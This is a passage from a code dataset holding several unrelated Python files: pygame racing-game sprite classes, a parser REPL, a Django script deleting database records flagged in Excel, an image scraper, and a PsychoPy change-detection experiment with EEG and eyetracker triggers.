randomly.\"\"\"\n\tdef __init__(self, car):\n\t\tsuper().__init__(car[\"file\"])\n\t\tself.vy = car[\"vel\"]\n\t\t\n\t\tself.inside_rect = self.rect.copy()\n\t\tself.inside_rect.w = (self.inside_rect.w / 3) - car[\"minus\"][0]\n\t\tself.inside_rect.h -= car[\"minus\"][1]\n\t\t\n\t\tself.scale(car[\"size\"])\n\t\tself.flip(False, True)\n\t\tself.passed = False\n\t\t\n\tdef update(self, dt):\n\t\tself.rect.centery += (STRIP_VEL + self.vy) * dt * PIXEL_PER_SECOND\n\t\tself.inside_rect.centery += (STRIP_VEL + self.vy) * dt * PIXEL_PER_SECOND\n\t\tif self.rect.top >= HEIGHT:\n\t\t\tself.kill()\n\t\t\t\t\t\t\n\t\t\nclass AnimatedCar(pg.sprite.Sprite):\n\t\"\"\"A class of animated car.\"\"\"\n\tdef __init__(self, car):\n\t\tsuper().__init__()\n\t\t\n\t\tself.images = []\n\t\tself.index = 0\n\t\tself.vy = car[\"vel\"]\n\t\tself.frameCount = -1\n\t\t\n\t\tfor fn in car[\"file\"]:\n\t\t\timage = pg.image.load(fn)\n\t\t\timage = pg.transform.scale(image, car[\"size\"])\n\t\t\tself.images.append(pg.transform.flip(image, False, True))\n\t\t\t\n\t\tself.image = self.images[0]\n\t\tself.rect = self.image.get_rect()\n\t\t\n\t\tself.inside_rect = self.rect.copy()\n\t\tself.inside_rect.w = (self.inside_rect.w / 3) - car[\"minus\"][0]\n\t\tself.inside_rect.h -= car[\"minus\"][1]\n\t\t\n\t\tself.passed = False\n\t\t\t\n\tdef update(self, dt=1):\n\t\tself.rect.centery += (STRIP_VEL + self.vy) * dt * PIXEL_PER_SECOND\n\t\tself.inside_rect.centery += (STRIP_VEL + self.vy) * dt * PIXEL_PER_SECOND\n\t\tif self.frameCount == 0:\n\t\t\tself.index = (self.index + 1) % 3\n\t\t\tself.image = self.images[self.index]\n\t\tself.frameCount = (self.frameCount + 1) % 10\n\t\tif self.rect.top >= HEIGHT:\n\t\t\tself.kill()\n\t\t\n\tdef draw(self, surf):\n\t\tsurf.blit(self.image, self.rect)\n\t\t\n\nclass 
SideTrees(pg.sprite.Sprite):\n\t\"\"\"Brush class draw on side.\"\"\"\n\tdef __init__(self, road, tree):\n\t\tsuper().__init__()\n\t\t\n\t\tself.left = GameSprite(tree[\"filename\"])\n\t\tself.right = GameSprite(tree[\"filename\"])\n\t\t\n\t\tself.left.scale(tree[\"size\"])\n\t\tself.right.scale(tree[\"size\"])\n\t\tself.right.flip(True, False)\n\t\t\n\t\tself.left.rect.centerx = road.rect.left - 50\n\t\tself.right.rect.centerx = road.rect.right + 50\n\t\tself.left.rect.bottom = self.right.rect.bottom = HEIGHT\n\t\t\n\tdef update(self, dt=1):\n\t\tself.left.rect.y += STRIP_VEL * dt * PIXEL_PER_SECOND\n\t\tself.right.rect.y += STRIP_VEL * dt * PIXEL_PER_SECOND\n\t\tif self.left.rect.top >= HEIGHT:\n\t\t\tself.kill()\n\t\n\tdef draw(self, surf):\n\t\tsurf.blit(self.left.image, self.left.rect)\n\t\tsurf.blit(self.right.image, self.right.rect)\n\t\n\t\nclass Strips(pg.sprite.Sprite):\n\t\"\"\"Strip model draw on highway.\"\"\"\n\tdef __init__(self, road):\n\t\tsuper().__init__()\n\t\t\n\t\tself.rect1 = pg.Rect((0, 0), STRIP_SIZE)\n\t\tself.rect2 = pg.Rect((0, 0), STRIP_SIZE)\n\t\t\n\t\tx = ROAD_SIZE[0] / 3\n\t\tself.rect1.centerx = road.rect.left + x\n\t\tself.rect2.centerx = road.rect.left + x * 2\n\t\tself.rect1.bottom = self.rect2.bottom = HEIGHT\n\t\t\n\tdef update(self, dt=1):\n\t\t\"\"\"Update the strip\"\"\"\n\t\tself.rect1.y += STRIP_VEL * dt * PIXEL_PER_SECOND\n\t\tself.rect2.y += STRIP_VEL * dt * PIXEL_PER_SECOND\n\t\tif self.rect1.top >= HEIGHT:\n\t\t\tself.kill() \n\t\t\n\tdef draw(self, surf):\n\t\t\"\"\"Draw the rects.\"\"\"\n\t\tpg.draw.rect(surf, GRAY, self.rect1)\n\t\tpg.draw.rect(surf, GRAY, self.rect2)\n\t\t\n\t\t\nclass Sound:\n\tdef __init__(self):\n\t\tself.crash = pg.mixer.Sound(\"assets/audios/Crash.wav\")\n\t\tself.jump = pg.mixer.Sound(\"assets/audios/jump.wav\")\n\n\nclass Explosion(pg.sprite.Sprite):\n\tdef __init__(self, center):\n\t\tsuper().__init__()\n\t\t\n\t\tself.images = []\n\t\tfor fn in EXPLOSIONS:\n\t\t\timage = pg.transform.scale(pg.image.load(fn).convert_alpha(), (100, 100))\n\t\t\tself.images.append(image)\n\t\t\t\n\t\tself.image = self.images[0]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = center\n\t\tself.fr = 0\n\t\tself.frame_rate = 50\n\t\tself.last_update = pg.time.get_ticks()\n\t\n\tdef update(self, dt=1):\n\t\tnow = pg.time.get_ticks()\n\t\tif now - self.last_update >= self.frame_rate:\n\t\t\tself.last_update = now\n\t\t\tself.fr += 1\n\t\t\tif self.fr == len(self.images):\n\t\t\t\tself.kill()\n\t\t\telse:\n\t\t\t\tcenter = self.rect.center\n\t\t\t\tself.image = self.images[self.fr]\n\t\t\t\tself.rect = self.image.get_rect()\n\t\t\t\tself.rect.center = center\n\t\n\tdef draw(self, surf):\n\t\tsurf.blit(self.image, self.rect)\n\t\t\n\nclass Score:\n\tdef __init__(self):\n\t\tself.font = pg.font.Font(FONT_DIR + 'score.ttf', 100)\n\t\tself.text_surf = self.font.render('0', True, WHITE)\n\t\tself.value = 0\n\t\t\n\tdef update(self):\n\t\tself.value += 1\n\t\tself.text_surf = self.font.render(str(self.value), True, WHITE)\n\t\t\n\tdef draw(self, surf):\n\t\tsurf.blit(self.text_surf, (20, 20))\n\t\t\n\t\t","repo_name":"pitubit/F1_Race","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26804582297","text":"from pathlib import Path\nimport pprint\n\nfrom ompy.evaluator import evaluate # , parevde_file\n\n\ndef evaluator(sourcef, targetf, force):\n if sourcef == '-':\n print(\n 'each 
line of input will be parsed -> evaluated -> deparsed',\n end=''\n )\n if targetf:\n if not force and Path(targetf).exists():\n raise FileExistsError(targetf)\n print( ', and written to', targetf )\n with open(targetf, 'w') as fp:\n try:\n while True:\n res = evaluate( input('> ') )\n pprint.pprint(res)\n print('\\t >>', targetf)\n fp.write('{' + res + '}')\n except (EOFError, KeyboardInterrupt):\n print('\\nbye!')\n else:\n print()\n while True:\n print('<', evaluate( input('> ')) )\n else:\n with open(sourcef, 'r') as fp:\n source = evaluate(fp.read())\n if targetf:\n with open(targetf, 'w') as fp:\n fp.write(source)\n else:\n pprint.pprint(source)\n","repo_name":"catb0t/ast-schemas","sub_path":"om/ompy/repl/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"14925200670","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# Евгений Супрун, suprune20 at gmail.com, 2013\n# delete-doubles.py\n# -----------------\n#\n# Удаление т.н. \"двойников\" согласно соодержимому файлов\n# формата Microsoft Excel 2003. Имена файлов\n# передаются в качестве параметров.\n#\n# Каждый исходный файл (книга Excel) может состоять из одного\n# или нескольких листов. Дополнительн��е листы сформированы,\n# если число строк в первом листе (предыдущем листе)\n# превысит максимум для формата Excel 2003: 65535\n#\n# Поля в листе (листах):\n# 0. Пустое, для правке пользователем. Если заказчик\n# поставит там знак, то соответсвующий погибший \n# подлежит удалению из базы данных при дальнейшей\n# обработке выходного файла Excel.\n# 1. Ф И О. Оно же ссылка на правку данных о погибшем\n# 2. Звание\n# 3. Дата рождения: ДД.ММ.ГГГГ или ММ.ГГГГ или ГГГГ\n# 4. Дата смерти: ДД.ММ.ГГГГ или ММ.ГГГГ или ГГГГ\n# 5. Номер захоронения. Он же ссылка на правку захоронения\n# 6. Информация о захороненном\n#\n# Остальные колонки -- не для пользователя, а служебные\n# 7. uuid погибшего\n# 8. Фамилия\n# 9. Имя\n# 10. Отчество\n# 11. Номер захоронения\n#\n\n# this is from the beginning!\nfrom __future__ import print_function\n\nimport sys\n\nimport xlrd\n\nsys.path.append('/home/django/projects/mil')\nfrom django.core.management import setup_environ\nimport settings\nsetup_environ(settings)\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom common.models import Person\n\n# Номера соотв. 
колонок\n(UUID_COL, LAST_NAME_COL, FIRST_NAME_COL, PATRONYMIC_COL, BURIAL_COL,) = \\\n (8, 9, 10, 11, 12,)\n\ndef main():\n print(\"\\n\" + \\\n sys.argv[0] + \"\\n\" + \\\n \"-\" * len(sys.argv[0]) + \"\\n\" + \\\n u\"Удаление записей о воинах, отмеченных в файле Microsoft Excel\\n\",\n file=sys.stderr\n )\n if len(sys.argv) < 2:\n print(u\"Параметр(ы):\\n\" + \\\n u\" - файл(ы) Excel с записями, отмеченными на удаление\\n\" + \\\n u'Отчет:\\n' + \\\n u' - стандартный вывод\\n',\n file=sys.stderr\n )\n sys.exit(1)\n \n persons = Person.objects.all()\n \n count_deleted_all = 0\n count_errors = 0\n for xls in sys.argv[1:]:\n count_deleted_book = 0\n print (u\"ФАЙЛ:\".encode('utf-8'), end=' ')\n print (xls)\n try:\n book = xlrd.open_workbook(xls)\n except IOError:\n print (u\" ОШИБКА: Excel-файл не найден или ошибка чтения\")\n continue\n except:\n print (u\" ОШИБКА: неверный формат Excel-файла\")\n continue\n \n for sheet_name in sorted(list(book.sheet_names())):\n print (u\" лист:\".encode('utf-8'), end=' ')\n print (sheet_name)\n sheet = book.sheet_by_name(sheet_name)\n row = 0\n count_deleted_sheet = 0\n while row < sheet.nrows:\n cell0 = sheet.cell(row,0)\n if cell0.ctype == xlrd.XL_CELL_TEXT and cell0.value.strip():\n cell = sheet.cell(row,UUID_COL)\n if cell.ctype == xlrd.XL_CELL_TEXT and cell.value:\n try:\n p = persons.get(uuid=cell.value)\n try:\n fio = p.last_name\n if p.first_name:\n fio += ' ' + p.first_name\n if p.patronymic:\n fio += ' ' + p.patronymic\n p.delete()\n print(u\" Удален: (стр. %s) %s\" % (unicode(row+1), fio,))\n count_deleted_sheet += 1\n count_deleted_book += 1\n count_deleted_all += 1\n except:\n count_errors += 1\n print(u\" ОШИБКА удаления: строка %s\" % unicode(row+1))\n except ObjectDoesNotExist:\n count_errors += 1\n print(u\" ОШИБКА: строка %s, не найден погибший\" % unicode(row+1))\n row += 1\n print(u\" Удалено на листе: %d\" % count_deleted_sheet)\n print(u\"ИТОГО Удалено в файле: %d\" % count_deleted_book)\n print(u\"\\nВСЕГО удалено: %d\" % count_deleted_all)\n print(u\"ОШИБОК: %d\" % count_errors)\n\nmain()\n","repo_name":"6jlarogap/mil","sub_path":"contrib/delete-doubles.py","file_name":"delete-doubles.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41342066042","text":"import requests\nimport os\nimport re\nimport time\n\ni = 3\ndir_name = \"E:\\win10\\Pictures\\图趣网每日一图\" # 设置图片保存地址\nif not os.path.exists(dir_name):\n os.mkdir(dir_name) # 创建目录\nelse:\n print(\"文件已存在:\", dir_name)\nwhile i <= 14:\n html = \"http://www.tuquu.com/pic/index_%s.html\" % i\n response = requests.get(html)\n response.encoding = response.apparent_encoding # 设置编码格式,防乱码\n text = response.text # 主网页的html代码\n # print(text)\n htmls = re.findall(r'', text) # 匹配含有高清图的网址\n try:\n print(\"这是第%s页!\" % i)\n i += 1\n count = 0\n # print(htmls)\n for h in htmls:\n img_path = dir_name + '\\\\' + h[1] + '.jpg' # 设置图片路径\n if not os.path.exists(img_path):\n response1 = requests.get(h[0])\n response1.encoding = response1.apparent_encoding\n img_html = re.findall(r'.*?', response1.text) # 图片下载地址\n # print(\"匹配的所有内容:\", img_html)\n response2 = requests.get(img_html[0]) # 请求地址\n # print(img_html[0])\n with open(img_path, 'wb') as f:\n f.write(response2.content)\n count += 1\n print(\"第%s张:\" % count, h[1], \"保存成功。\")\n time.sleep(0.2)\n except Exception as e:\n print(\"爬取失败!错误如下:\")\n 
print(e)","repo_name":"ALiang-NO1/python-learn","sub_path":"Python爬虫/爬虫/requests/5爬取图趣网图片.py","file_name":"5爬取图趣网图片.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12336931092","text":"from __future__ import division\nfrom psychopy import visual, event, core, gui, parallel, monitors\nfrom psychopy.visual import ShapeStim, TextStim, Circle, Rect\nimport numpy as np\nimport random, csv\nimport eyelinker\nimport changedetection\nimport os\n\n##################\n#EXPERIMENT SETUP#\n##################\n\n#Things You May Want to Change\nntrials = 120 #must be a multiple of 4\nnblocks = 14\nnset = 4\nmax_per_quad = 2\nmin_distance = 4\ndist_from_fix = 6\nsame_key = 's'\ndiff_key = 'd'\nstim_size = 2\ndistractor_size = ((stim_size**2)/3.1415)**(1/2) \nsync = 'sync ' #must have space at end of string!\n\n#Color Setup\ndef color_convert(color):\n return [round(((n/127.5)-1), 2) for n in color]\n\nncolors = 7\ncolor_array_idx = [0,1,2,3,4,5,6]\ncolor_table =[\n [255, 0, 0],\n [0, 255, 0],\n [0, 0, 255],\n [255, 255, 0],\n [255, 0, 255],\n [0, 255, 255],\n [255, 128, 0]\n]\n\nrgb_table = []\nfor colorx in color_array_idx:\n rgb_table.append(color_convert(color_table[colorx]))\ngrey = color_convert([166,166,166])\n\n#Monitor Setup\nmonitor_name='Experiment Monitor' \nmonitor_width=53\nmonitor_distance=70\nmonitor_px=[1920, 1080]\n\nexperiment_monitor = monitors.Monitor(\n monitor_name, width=monitor_width,\n distance=monitor_distance)\nexperiment_monitor.setSizePix(monitor_px)\n\n#Instructions\ninstruct_text =(\n 'In this experiment you will be remembering colored squares.\\n\\n'\n 'Each trial will start with a fixation cross. '\n 'Do your best to keep your eyes on it at all times.\\n'\n 'Then, an array of colored squares and grey circles will appear.\\n'\n 'Remember the colored squares and their locations as best you can.\\n'\n 'Ignore the grey circles. 
You will not be tested on these.\\n'\n 'After a short delay, a colored square will reappear.\\n'\n 'If it has the SAME color as the previous square in its location, press the \"S\" key.\\n'\n 'If it has a DIFFERENT color, press the \"D\" key.\\n'\n 'If you are not sure, just take your best guess.\\n\\n'\n 'You will get breaks in between blocks.\\n'\n \"We'll start with some practice trials.\\n\\n\"\n 'Press the \"S\" key to start.'\n)\n\n#Misc Setup\ndata_lines_written = 0\nexperiment_info = {}\nexperiment_name = \"WST_18_exp1\"\ndata_keys = ['Subject',\n 'Age',\n 'Sex',\n 'Block',\n 'Trial',\n 'Timestamp',\n 'TrialType',\n 'SetSize',\n 'RT',\n 'CRESP',\n 'RESP',\n 'ACC',\n 'LocationTested',\n 'Locations',\n 'SampleColors',\n 'TestColors']\n\n###########\n#FUNCTIONS#\n###########\n\ndef get_experiment_info_dlg(additional_fields_dict=None):\n experiment_info = {\n 'Subject Number': '0',\n 'Age': '0',\n 'Sex': '',\n 'Experimenter Initials': 'WST',\n 'Unique Subject Identifier': '000000'\n } \n\n if additional_fields_dict is not None:\n experiment_info.update(additional_fields_dict)\n\n #Modifies experiment_info dict directly\n cont = gui.DlgFromDict(\n experiment_info, title=experiment_name,\n order=['Subject Number',\n 'Age',\n 'Sex',\n 'Experimenter Initials',\n 'Unique Subject Identifier'\n ],\n tip={'Unique Subject Identifier': 'From the cronus log'},\n screen = 1\n )\n\n if not cont.OK: exit()\n\n return experiment_info\n\ndef experiment_questions():\n question = {'Practice':'Y','Eyetracking':'Y','EEG':'Y','Stim Track':'Y'}\n\n cont = gui.DlgFromDict(\n question,title=experiment_name, fixed='Y/N',screen=1)\n \n if not cont.OK: \n question['Practice'] = 'n'\n question['Eyetracking'] = 'n'\n question['EEG'] = 'n'\n question['Stim Track'] = 'n'\n\n return question\n\ndef setup_stim():\n #main window\n win = visual.Window(monitor = experiment_monitor, fullscr = True, units='deg')\n\n #fixation cross\n fix = TextStim(win, pos = [0,0], text='+', color=[-1, -1, -1], height = 32, units='pix')\n\n #stimulus\n square = visual.Rect(win, lineColor=None, fillColor=[0,0,0], fillColorSpace='rgb', width=stim_size, height=stim_size,units='deg')\n circle = visual.Circle(win, lineColor=None, fillColor=grey, fillColorSpace='rgb', radius=distractor_size,units='deg')\n white_track = visual.Circle(win, lineColor=None, fillColor = [1,1,1], fillColorSpace='rgb',radius=20, pos = [930,510],units='pix')\n black_track = visual.Circle(win, lineColor=None, fillColor = [-1,-1,-1], fillColorSpace='rgb',radius=20, pos = [930,510],units='pix')\n\n return win, fix, square, circle, white_track, black_track\n\ndef open_csv(experiment_info):\n #Create file name for csv\n file_name = experiment_name + '_' + experiment_info['Subject Number'] + '.csv'\n #write the headers for csv\n with open(file_name, 'wb') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=data_keys)\n writer.writeheader()\n return file_name\n\ndef write_to_csv(data, file_name):\n with open(file_name, 'ab') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames = data_keys)\n writer.writerow(data)\n \n#Text Screen\n#Useful for instructions, break screens, end experiment\ndef text_screen(\n text = '', text_color = [-1,-1,-1], text_height = 36, win = None,\n bg_color = [0,0,0], wait_for_input = True, input_keys = None):\n\n backgroundRect = visual.Rect(\n win, fillColor=bg_color, units='norm',\n width=20, height=20)\n\n textObject = visual.TextStim(\n win, text=text, color=text_color, units='pix',\n height=text_height, alignHoriz='center', 
alignVert='center',\n wrapWidth=round(.8*win.size[0]))\n\n backgroundRect.draw()\n textObject.draw()\n win.flip()\n\n keys = None\n\n if wait_for_input:\n core.wait(0.2) #prevents accidental keypresses\n keys = event.waitKeys(keyList = input_keys)\n win.flip()\n\n return keys\n\n#make the parameters for current block trials\ndef make_block():\n diff_trials = np.tile([0,1], ntrials//2) #0101... for ntrials\n diff_trials = np.random.permutation(diff_trials) #randomized 0s and 1s\n \n num_stim = np.tile([1,2,3,4], ntrials//4) #1,2,3,4,5 for n trials, assumes divisible by 5\n num_stim = np.random.permutation(num_stim) #randomize\n \n num_gstim = 5 - num_stim \n\n return num_stim, diff_trials, num_gstim\n\ndef _which_quad(loc):\n if loc[0] < 0 and loc[1] < 0:\n return 0\n elif loc[0] >= 0 and loc[1] < 0:\n return 1\n elif loc[0] < 0 and loc[1] >= 0:\n return 2\n else:\n return 3\n\n#check if locs are too close to eachother or the fixation\ndef _too_close(attempt, locs):\n if np.linalg.norm(np.array(attempt)) < min_distance:\n return True # Too close to center\n\n for loc in locs:\n if np.linalg.norm(np.array(attempt) - np.array(loc)) < min_distance:\n return True # Too close to another square\n\n return False\n\n#generate locations for stimuli\ndef make_locs(itrial):\n quad_count = [0,0,0,0]\n locs = []\n counter = 0\n while len(locs) < 5:\n counter += 1\n if counter > 1000:\n raise ValueError('Timeout -- Cannot generate locations with given values.')\n \n attempt = [random.uniform(-dist_from_fix, dist_from_fix) for _ in range(2)]\n \n if _too_close(attempt, locs):\n continue\n\n if max_per_quad is not None:\n quad = _which_quad(attempt)\n if max(quad_count) > 0:\n if sum(quad_count) >= 4:\n if quad_count[quad] < max_per_quad:\n locs.append(attempt)\n quad_count[quad] += 1\n else:\n if quad_count[quad] < max_per_quad:\n if quad_count[quad] < max(quad_count):\n locs.append(attempt)\n quad_count[quad] += 1\n else: \n locs.append(attempt)\n quad_count[quad] += 1\n else:\n locs.append(attempt)\n print(locs)\n return locs\n\ndef make_trial(diff_trials, num_stim, num_gstim, itrial):\n #pick colors for stim, it is the size of the num of stim for this trial\n stim_color_idx = np.random.choice(color_array_idx, size = num_stim[itrial], replace = False)\n \n #preallocating stim color matrix\n stim_color = np.zeros(shape = [num_stim[itrial],3]) \n\n #loop thru for num of stim and choose a color for each stim\n for istim in range(num_stim[itrial]):\n stim_color[istim] = rgb_table[stim_color_idx[istim]]\n\n #calls the make_locs function and returns num_stim number of x,y locations\n locs = make_locs(itrial)\n #arbitrarily always test on the first loc\n test_loc = locs[0]\n\n #correct response keys and test color\n if diff_trials[itrial] == 0: #same trials\n cresp = same_key\n #make stim test color match stim color (test loc is always first loc which has first color)\n test_color = stim_color[0]\n else: #different trials\n cresp = diff_key\n #any color that isn't the first one\n other_color = np.setdiff1d(color_array_idx,stim_color_idx[1:])\n #choose randomly from temp which is anything that isn't a stim color\n test_color_idx = np.random.choice(other_color,size=1)\n test_color = rgb_table[int(test_color_idx)]\n\n trial = {\n 'set_size': num_stim[itrial],\n 'trial_type': diff_trials[itrial],\n 'cresp': cresp,\n 'locations': locs,\n 'stim_colors': stim_color,\n 'test_color': test_color,\n 'test_location': test_loc,\n }\n return trial\n\ndef display_trial(trial, trial_idx,itrial, iblock, win, fix, 
square,circle,white_track,black_track,question,experiment_info,num_prac=None,tracker=None):\n #Recording Check\n if trial_idx == 1 or num_prac == 1:\n text_screen(text='Experimenter, are you recording?', input_keys='y',bg_color=[0,0,.3],win=win)\n \n #Subject initiates block\n if itrial == 0:\n text_screen(text='Press S to begin block', input_keys = 's', win=win)\n\n trial_code = 101 + itrial\n block_code = 231 + iblock \n\n if question['Eyetracking'] == 'Y':\n if num_prac is None:\n tracker.send_message(str(trial_code)) #send eyetraker trial num\n tracker.send_message(str(block_code)) #send eyetracker block num\n else:\n tracker.send_message('Practice')\n status = 'Trial Type:%s, Block: %d, Trial: %d' % (trial['trial_type'], iblock+1, itrial+1)\n tracker.send_status(status)\n tracker.start_recording() \n\n if question['EEG']=='Y':\n if num_prac is None:\n parallel.setData(1)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '1')\n\n if question['Stim Track'] == 'Y':\n black_track.draw() \n fix.draw()\n win.flip()\n\n #BEGIN ITI# also experimenter input for pause/calibrate/escape\n iti = (random.randrange(600,1000,20))/1000\n resp = []\n resp = event.waitKeys(maxWait=iti, keyList=['escape','o','b','m'])\n if resp == ['escape']:\n win.close()\n if tracker:\n tracker.stop_recording()\n tracker.set_offline_mode()\n tracker.close_edf()\n tracker.transfer_edf()\n tracker.close_connection()\n exit()\n if resp == ['o']:\n if tracker:\n tracker.calibrate()\n fix.draw()\n win.flip()\n core.wait(1.5)\n if resp == ['b']:\n TextStim(win=win,text='Blink',pos = [0,1], color = [1,-1,-1]).draw()\n fix.draw()\n win.flip()\n core.wait(1)\n fix.draw()\n win.flip()\n core.wait(1)\n if resp == ['m']:\n TextStim(win=win,text='Eye Movement',pos = [0,1], color = [1,-1,-1]).draw()\n fix.draw()\n win.flip()\n core.wait(1)\n fix.draw()\n win.flip()\n core.wait(1)\n if question['Stim Track'] == 'Y':\n black_track.draw()\n\n #END ITI\n\n #STIM PRESENTATION#\n fix.draw()\n\n #draw stim\n for istim in range(trial['set_size']):\n square.fillColor = trial['stim_colors'][istim]\n square.pos = trial['locations'][istim]\n square.draw()\n\n #draw grey stim\n for istim in range(5-trial['set_size']):\n circle.pos = trial['locations'][trial['set_size']+istim]\n circle.draw()\n \n if question['Stim Track'] == 'Y':\n white_track.draw()\n\n if question['Eyetracking'] == 'Y':\n tracker.send_message('ArrayOnset')\n\n if question['EEG']=='Y':\n if num_prac is None:\n if trial['set_size'] == 1:\n parallel.setData(11)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync+'11')\n if trial['set_size'] == 2:\n parallel.setData(12)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync+'12')\n if trial['set_size'] == 3:\n parallel.setData(13)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync+'13')\n if trial['set_size'] == 4:\n parallel.setData(14)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync+'14')\n\n #show stim\n win.flip()\n core.wait(.25) #amount of time for stim presentation\n #END STIM PRESENTATION#\n\n #BEGIN DELAY PERIOD#\n fix.draw()\n if question['Stim Track'] == 'Y':\n white_track.draw()\n if question['EEG']=='Y':\n if num_prac is None:\n parallel.setData(21)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '21')\n win.flip()\n core.wait(1)\n\n #END DELAY PERIOD#\n\n #BEGIN PROBE#\n square.fillColor = trial['test_color']\n square.pos = trial['test_location']\n square.draw()\n fix.draw()\n \n if question['Stim Track'] == 'Y':\n 
black_track.draw()\n \n if question['EEG']=='Y':\n if num_prac is None:\n if trial['trial_type'] == 0:\n parallel.setData(31)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '31')\n else: \n parallel.setData(32)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '32')\n\n win.flip()\n\n #get response\n rt_timer = core.MonotonicClock() #start timer\n\n resp = event.waitKeys(keyList=[same_key,diff_key], timeStamped=rt_timer)\n\n keyresp = resp[0][0] #log response \n\n acc = 1 if keyresp == trial['cresp'] else 0 #record accuracy\n \n if question['EEG']=='Y':\n if num_prac is None:\n if acc == 1:\n parallel.setData(41)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '41')\n else:\n parallel.setData(42)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '42')\n\n rt = resp[0][1]*1000 # key and rt in milliseconds\n\n data = {\n 'Subject': experiment_info['Subject Number'],\n 'Age': experiment_info['Age'],\n 'Sex': experiment_info['Sex'],\n 'Block': iblock + 1,\n 'Trial': itrial + 1,\n 'Timestamp': core.getAbsTime(),\n 'TrialType': trial['trial_type'],\n 'SetSize': trial['set_size'],\n 'RT': rt,\n 'CRESP': trial['cresp'],\n 'RESP': keyresp,\n 'ACC': acc,\n 'LocationTested': trial['test_location'],\n 'Locations': trial['locations'],\n 'SampleColors': trial['stim_colors'],\n 'TestColors': trial['test_color'],\n }\n\n if question['Eyetracking'] == 'Y':\n tracker.stop_recording()\n return data\n\n################\n#Run Experiment#\n################\ndef run_exp(): \n #run experiment dialog boxes\n experiment_info = get_experiment_info_dlg()\n question = experiment_questions()\n \n data_directory = os.getcwd()\n\n change_detection_K = changedetection.Ktask(number_of_trials_per_block=1,\n number_of_blocks=2, experiment_name='KTask_'+experiment_name,\n data_fields=changedetection.data_fields, set_sizes=[6],\n monitor_distance=monitor_distance, data_directory=data_directory)\n\n #change_detection_K.run()\n\n win, fix, square, circle, white_track, black_track = setup_stim()\n\n if question['Eyetracking'] == 'Y':\n tracker = eyelinker.EyeLinker(\n win, 'CDET' + experiment_info['Subject Number'] + '.edf','LEFT')\n\n if question['Eyetracking'] == 'Y':\n #Eyetracking \n tracker.initialize_graphics()\n tracker.open_edf()\n tracker.initialize_tracker()\n tracker.send_calibration_settings()\n\n #open csv to write data to\n file_name = open_csv(experiment_info=experiment_info)\n\n #instructions\n text_screen(text = instruct_text, input_keys='s', win = win)\n\n #initialization\n prac_acc_num = 0\n prac_acc = 0\n num_prac = 0\n prac_cont = ['y']\n trial_idx = 0 #trial number tracker initialization\n total_block_acc = 0\n total_block_acc_num = 0\n\n if question['EEG']=='Y':\n print(parallel.setPortAddress(53328))\n\n #Practice Trials\n if question['Practice'] == 'Y':\n if question['Eyetracking'] == 'Y':\n tracker.calibrate()\n\n while prac_cont == ['y']:\n num_stim, diff_trials, num_gstim = make_block()\n prac_acc_num = 0\n prac_acc = 0\n num_prac = 0\n for itrial in range(12):\n num_prac += 1\n \n trial = make_trial(diff_trials=diff_trials, num_stim=num_stim,num_gstim=num_gstim,itrial=itrial) #make trial info\n \n if question['Eyetracking'] == 'Y':\n data = display_trial(\n trial=trial, trial_idx = trial_idx, itrial=itrial, iblock = 1, win=win, fix=fix,square=square,circle=circle,tracker=tracker,\n white_track=white_track,black_track=black_track,question=question,experiment_info=experiment_info,num_prac=num_prac)\n else:\n data = display_trial(\n 
trial=trial, trial_idx = trial_idx, itrial=itrial, iblock = 1, win=win, fix=fix,square=square, circle=circle,\n white_track=white_track,black_track=black_track,question=question,experiment_info=experiment_info,num_prac=num_prac)\n prac_acc_num += data['ACC']\n prac_acc = prac_acc_num/num_prac\n print('Trial: {}, TrialType: {}, SetSize: {}, RESP: {}, CRESP: {}, ACC: {}'.format((itrial+1),data['TrialType'],data['SetSize'],data['RESP'],data['CRESP'],data['ACC']))\n \n prac_cont = text_screen(text = \"Accuracy: {}%\\n\\nKeep going?\".format(round(prac_acc,1)*100), input_keys=['n','y'],win=win)\n\n text_screen(text = \"Practice complete!\\n\\nThe experiment will now begin.\\nPress S to continue.\", input_keys='s',win=win)\n\n #run trials for nblocks*ntrials\n for iblock in range(nblocks):\n num_stim, diff_trials, num_gstim = make_block()\n block_acc_num = 0\n block_acc = 0\n\n if question['Eyetracking'] == 'Y':\n tracker.calibrate()\n \n for itrial in range(ntrials):\n trial_idx +=1\n\n ###EXPERIMENT###\n trial = make_trial(diff_trials=diff_trials, num_stim=num_stim, num_gstim=num_gstim,itrial=itrial) #make trial info\n\n if question['Eyetracking'] == 'Y':\n data = display_trial(\n trial=trial,trial_idx=trial_idx, itrial=itrial,iblock=iblock,win=win,fix=fix,square=square,white_track=white_track,\n black_track=black_track,question=question,experiment_info=experiment_info ,tracker=tracker, circle=circle)\n else:\n data = display_trial(\n trial=trial,trial_idx=trial_idx,itrial=itrial,iblock=iblock,win=win,fix=fix,square=square,white_track=white_track,\n black_track=black_track,question=question,experiment_info=experiment_info,circle=circle) \n\n write_to_csv(data = data, file_name=file_name) #write individual trial info to csv\n\n print('Block: {}, Trial: {}, TrialType: {}, SetSize: {}, ACC: {}, CRESP: {}, RESP: {}'.format(data['Block'],data['Trial'],data['TrialType'],data['SetSize'],data['ACC'],data['CRESP'],data['RESP']))\n\n 